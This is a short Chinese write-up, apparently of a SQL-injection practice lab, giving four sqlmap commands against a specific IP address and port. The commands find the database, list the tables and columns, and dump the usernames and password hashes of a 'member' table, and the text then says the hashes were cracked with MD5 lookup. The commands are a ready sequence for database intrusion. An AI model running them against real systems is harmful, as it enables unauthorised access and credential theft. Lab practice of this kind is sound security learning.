使用Sqlmap工具注入
1、首先获取数据库名
Python sqlmap.py -u"http://219.153.49.228:49953/new_list.php?id=1" --current-db
2、从获取的数据名中查询数据中的表名
Python sqlmap.py -u"http://219.153.49.228:46042/new_list.php?id=1" -D stormgroup --tables
3、由数据名表名来注入获取列名
Python sqlmap.py -u “http://219.153.49.228:46042/new_list.php?id=1” -D stormgroup -T member --columns
4、从爆出的列名中dump出值
Python sqlmap.py -u"http://219.153.49.228:46042/new_list.php?id=1" -D stormgroup -T member -C name,password --dump
5、爆出两个账号密码,MD5解密即可得出密码,分别解密后发现第二个密码是正确的,毕竟正确的东西藏得比较深。
SQL注入漏洞测试(布尔盲注)
最新推荐文章于 2024-03-09 10:30:00 发布